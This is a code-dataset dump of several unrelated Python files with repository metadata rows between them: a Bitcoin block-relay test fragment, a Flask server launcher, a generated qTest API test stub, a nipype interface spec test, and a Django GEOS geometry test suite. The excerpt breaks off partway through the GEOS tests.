test_node.last_message.pop("getdata", None)
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_message["getdata"]
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
self.log.info("Inv at tip triggered getdata for unprocessed block")
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
self.log.info("Successfully reorged to longer chain from non-whitelisted peer")
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
| 44.773333
| 107
| 0.668156
|
4a04cd27a5a8ac51d0393a15da3a8bb86d9fd92a
| 615
|
py
|
Python
|
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | null | null | null |
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | 1
|
2021-06-07T17:15:42.000Z
|
2021-06-07T17:15:42.000Z
|
runserver.py
|
Samiasa/UsabilityConsole
|
38fa0d97d27c5f92e23f369d862602b0e9bca47d
|
[
"RSA-MD"
] | 1
|
2021-03-03T20:18:15.000Z
|
2021-03-03T20:18:15.000Z
|
from console import app
from config import DEBUG, HOST, PORT, RESET_DATABASE_ON_START
from flask import session as flask_session
import os
import logging
import utils
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] [%(levelname)s] -- %(message)s', datefmt='%d-%b-%y %H:%M:%S')
if __name__ == "__main__":
logging.debug("Starting server. DEBUG=%s", DEBUG)
try:
if DEBUG and RESET_DATABASE_ON_START:
utils.delete_file_if_exists(os.path.join('console', 'db', 'database.db'), 'Deleting previous database...')
finally:
app.run(debug=DEBUG, host=HOST, port=PORT)
| 32.368421
| 124
| 0.699187
|
4a04d04953c5357d9136fd68edf035f03b91a845
| 881
|
py
|
Python
|
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
test/test_requirement_resource.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.requirement_resource import RequirementResource
class TestRequirementResource(unittest.TestCase):
""" RequirementResource unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testRequirementResource(self):
"""
Test RequirementResource
"""
model = swagger_client.models.requirement_resource.RequirementResource()
if __name__ == '__main__':
unittest.main()
| 20.488372
| 81
| 0.668558
|
4a04d1409df2d3b1d1bc8effbb1ba3078d537da2
| 3,098
|
py
|
Python
|
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/mrtrix/tests/test_auto_SphericallyDeconvolutedStreamlineTrack.py
|
Conxz/nipype
|
1281723ae56eacd103597ff4081a205583706e62
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ....testing import assert_equal
from ..tracking import SphericallyDeconvolutedStreamlineTrack
def test_SphericallyDeconvolutedStreamlineTrack_inputs():
input_map = dict(args=dict(argstr='%s',
),
cutoff_value=dict(argstr='-cutoff %s',
units='NA',
),
desired_number_of_tracks=dict(argstr='-number %d',
),
do_not_precompute=dict(argstr='-noprecomputed',
),
environ=dict(nohash=True,
usedefault=True,
),
exclude_file=dict(argstr='-exclude %s',
xor=[u'exclude_file', u'exclude_spec'],
),
exclude_spec=dict(argstr='-exclude %s',
position=2,
sep=',',
units='mm',
xor=[u'exclude_file', u'exclude_spec'],
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
in_file=dict(argstr='%s',
mandatory=True,
position=-2,
),
include_file=dict(argstr='-include %s',
xor=[u'include_file', u'include_spec'],
),
include_spec=dict(argstr='-include %s',
position=2,
sep=',',
units='mm',
xor=[u'include_file', u'include_spec'],
),
initial_cutoff_value=dict(argstr='-initcutoff %s',
units='NA',
),
initial_direction=dict(argstr='-initdirection %s',
units='voxels',
),
inputmodel=dict(argstr='%s',
position=-3,
usedefault=True,
),
mask_file=dict(argstr='-mask %s',
xor=[u'mask_file', u'mask_spec'],
),
mask_spec=dict(argstr='-mask %s',
position=2,
sep=',',
units='mm',
xor=[u'mask_file', u'mask_spec'],
),
maximum_number_of_tracks=dict(argstr='-maxnum %d',
),
maximum_tract_length=dict(argstr='-length %s',
units='mm',
),
minimum_radius_of_curvature=dict(argstr='-curvature %s',
units='mm',
),
minimum_tract_length=dict(argstr='-minlength %s',
units='mm',
),
no_mask_interpolation=dict(argstr='-nomaskinterp',
),
out_file=dict(argstr='%s',
name_source=[u'in_file'],
name_template='%s_tracked.tck',
output_name='tracked',
position=-1,
),
seed_file=dict(argstr='-seed %s',
xor=[u'seed_file', u'seed_spec'],
),
seed_spec=dict(argstr='-seed %s',
position=2,
sep=',',
units='mm',
xor=[u'seed_file', u'seed_spec'],
),
step_size=dict(argstr='-step %s',
units='mm',
),
stop=dict(argstr='-stop',
),
terminal_output=dict(nohash=True,
),
unidirectional=dict(argstr='-unidirectional',
),
)
inputs = SphericallyDeconvolutedStreamlineTrack.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_SphericallyDeconvolutedStreamlineTrack_outputs():
output_map = dict(tracked=dict(),
)
outputs = SphericallyDeconvolutedStreamlineTrack.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 26.706897
| 78
| 0.629761
|
4a04d15ad9bf59e31d09746d2f74acef5c086c66
| 42,100
|
py
|
Python
|
django/contrib/gis/geos/tests/test_geos.py
|
mitar/django
|
aa757ac22de3e657df49086cf01a26f6c73b8dfb
|
[
"BSD-3-Clause"
] | 1
|
2016-05-09T02:41:07.000Z
|
2016-05-09T02:41:07.000Z
|
django/contrib/gis/geos/tests/test_geos.py
|
akaihola/django
|
169b1a404c8118bb75840523d5fb3543de9c8889
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/gis/geos/tests/test_geos.py
|
akaihola/django
|
169b1a404c8118bb75840523d5fb3543de9c8889
|
[
"BSD-3-Clause"
] | null | null | null |
import ctypes
import random
import unittest
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import gdal, numpy, GEOSBase
from django.contrib.gis.geos.libgeos import GEOS_PREPARE
from django.contrib.gis.geometry.test_data import TestDataMixin
class GEOSTest(unittest.TestCase, TestDataMixin):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
def test00_base(self):
"Tests out the GEOSBase class."
# Testing out GEOSBase class, which provides a `ptr` property
# that abstracts out access to underlying C pointers.
class FakeGeom1(GEOSBase):
pass
# This one only accepts pointers to floats
c_float_p = ctypes.POINTER(ctypes.c_float)
class FakeGeom2(GEOSBase):
ptr_type = c_float_p
# Default ptr_type is `c_void_p`.
fg1 = FakeGeom1()
# Default ptr_type is C float pointer
fg2 = FakeGeom2()
# These assignments are OK -- None is allowed because
# it's equivalent to the NULL pointer.
fg1.ptr = ctypes.c_void_p()
fg1.ptr = None
fg2.ptr = c_float_p(ctypes.c_float(5.23))
fg2.ptr = None
# Because pointers have been set to NULL, an exception should be
# raised when we try to access it. Raising an exception is
# preferrable to a segmentation fault that commonly occurs when
# a C method is given a NULL memory reference.
for fg in (fg1, fg2):
# Equivalent to `fg.ptr`
self.assertRaises(GEOSException, fg._get_ptr)
# Anything that is either not None or the acceptable pointer type will
# result in a TypeError when trying to assign it to the `ptr` property.
# Thus, memmory addresses (integers) and pointers of the incorrect type
# (in `bad_ptrs`) will not be allowed.
bad_ptrs = (5, ctypes.c_char_p('foobar'))
for bad_ptr in bad_ptrs:
# Equivalent to `fg.ptr = bad_ptr`
self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test01a_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
def test01b_hexewkb(self):
"Testing (HEX)EWKB output."
from binascii import a2b_hex
# For testing HEX(EWKB).
ogc_hex = '01010000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
hexewkb_2d = '0101000020E61000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
hexewkb_3d = '01010000A0E61000000000000000000000000000000000F03F0000000000000040'
pnt_2d = Point(0, 1, srid=4326)
pnt_3d = Point(0, 1, 2, srid=4326)
# OGC-compliant HEX will not have SRID nor Z value.
self.assertEqual(ogc_hex, pnt_2d.hex)
self.assertEqual(ogc_hex, pnt_3d.hex)
# HEXEWKB should be appropriate for its dimension -- have to use an
# a WKBWriter w/dimension set accordingly, else GEOS will insert
# garbage into 3D coordinate if there is none. Also, GEOS has a
# a bug in versions prior to 3.1 that puts the X coordinate in
# place of Z; an exception should be raised on those versions.
self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
if GEOS_PREPARE:
self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)
else:
try:
hexewkb = pnt_3d.hexewkb
except GEOSException:
pass
else:
self.fail('Should have raised GEOSException.')
# Same for EWKB.
self.assertEqual(buffer(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
if GEOS_PREPARE:
self.assertEqual(buffer(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
else:
try:
ewkb = pnt_3d.ewkb
except GEOSException:
pass
else:
self.fail('Should have raised GEOSException')
# Redundant sanity check.
self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test01c_kml(self):
"Testing KML output."
for tg in self.geometries.wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
def test01d_errors(self):
"Testing the Error handlers."
# string-based
print("\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n")
for err in self.geometries.errors:
try:
g = fromstr(err.wkt)
except (GEOSException, ValueError):
pass
# Bad WKB
self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
print("\nEND - expecting GEOS_ERROR; safe to ignore.\n")
class NotAGeometry(object):
pass
# Some other object
self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
# None
self.assertRaises(TypeError, GEOSGeometry, None)
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in self.geometries.hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in self.geometries.hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srids = (-1, 32140)
for srid in srids:
for p in self.geometries.polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test01i_json(self):
"Testing GeoJSON input/output (via GDAL)."
if not gdal or not gdal.GEOJSON: return
for g in self.geometries.json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
self.assertEqual(g.json, geom.json)
self.assertEqual(g.json, geom.geojson)
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test01k_fromfile(self):
"Testing the fromfile() factory."
from io import BytesIO
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = BytesIO()
wkt_f.write(ref_pnt.wkt)
wkb_f = BytesIO()
wkb_f.write(str(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test01k_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo' : 'bar'})
self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test02b_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertEqual(p.empty, False)
self.assertEqual(p.valid, True)
def test03a_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for l in self.geometries.linestrings:
ls = fromstr(l.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertEqual(ls.ring, False)
if hasattr(l, 'centroid'):
self.assertEqual(l.centroid, ls.centroid.tuple)
if hasattr(l, 'tup'):
self.assertEqual(l.tup, ls.tuple)
self.assertEqual(True, ls == fromstr(l.wkt))
self.assertEqual(False, ls == prev)
self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
if numpy: self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
def test03b_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for l in self.geometries.multilinestrings:
ml = fromstr(l.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
self.assertEqual(True, ml == fromstr(l.wkt))
self.assertEqual(False, ml == prev)
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test04_linearring(self):
"Testing LinearRing objects."
for rr in self.geometries.linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy: self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
def test05a_polygons(self):
"Testing Polygon objects."
# Testing `from_bbox` class method
bbox = (-180, -90, 180, 90)
p = Polygon.from_bbox( bbox )
self.assertEqual(bbox, p.extent)
prev = fromstr('POINT(0 0)')
for p in self.geometries.polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.empty, False)
self.assertEqual(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(True, poly == fromstr(p.wkt))
self.assertEqual(False, poly == prev) # Should not be equal to previous geometry
self.assertEqual(True, poly != prev)
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
self.assertRaises(GEOSIndexError, poly.__getitem__, len(poly))
self.assertRaises(GEOSIndexError, poly.__setitem__, len(poly), False)
self.assertRaises(GEOSIndexError, poly.__getitem__, -1 * len(poly) - 1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
self.assertRaises(TypeError, Polygon.__init__, 0, [1, 2, 3])
self.assertRaises(TypeError, Polygon.__init__, 'foo')
# Polygon(shell, (hole1, ... holeN))
rings = tuple(r for r in poly)
self.assertEqual(poly, Polygon(rings[0], rings[1:]))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test05b_multipolygons(self):
"Testing MultiPolygon objects."
print("\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n")
prev = fromstr('POINT (0 0)')
for mp in self.geometries.multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(GEOSIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertEqual(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
print("\nEND - expecting GEOS_NOTICE; safe to ignore.\n")
def test06a_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
#### Memory issues with rings and polygons
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(self.geometries.polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
s1, s2 = str(ring1), str(ring2)
def test08_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in self.geometries.polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in xrange(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2: tset = (5, 23)
else: tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test09_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for rg in self.geometries.relate_geoms:
a = fromstr(rg.wkt_a)
b = fromstr(rg.wkt_b)
self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
self.assertEqual(rg.pattern, a.relate(b))
def test10_intersection(self):
"Testing intersects() and intersection()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test11_union(self):
"Testing union()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test12_difference(self):
"Testing difference()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test13_symdifference(self):
"Testing sym_difference()."
for i in xrange(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test14_buffer(self):
"Testing buffer()."
for bg in self.geometries.buffer_geoms:
g = fromstr(bg.wkt)
# The buffer we expect
exp_buf = fromstr(bg.buffer_wkt)
quadsegs = bg.quadsegs
width = bg.width
# Can't use a floating-point for the number of quadsegs.
self.assertRaises(ctypes.ArgumentError, g.buffer, width, float(quadsegs))
# Constructing our buffer
buf = g.buffer(width, quadsegs)
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in xrange(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in xrange(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test15_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly: self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)): self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
# In GEOS 3.0.0rc1-4 when the EWKB and/or HEXEWKB is exported,
# the SRID information is lost and set to -1 -- this is not a
# problem on the 3.0.0 version (another reason to upgrade).
exp_srid = self.null_srid
p2 = fromstr(p1.hex)
self.assertEqual(exp_srid, p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
def test16_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
### Testing the mutability of Polygons ###
for p in self.geometries.polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup: new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
s = str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
### Testing the mutability of Geometry Collections
for tg in self.geometries.multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(1, 100), random.randint(1, 100))
# Testing the assignment
mp[i] = new
s = str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in self.geometries.multipolygons:
mpoly = fromstr(tg.wkt)
for i in xrange(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
# Offsetting the each ring in the polygon by 500.
for j in xrange(len(poly)):
r = poly[j]
for k in xrange(len(r)): r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
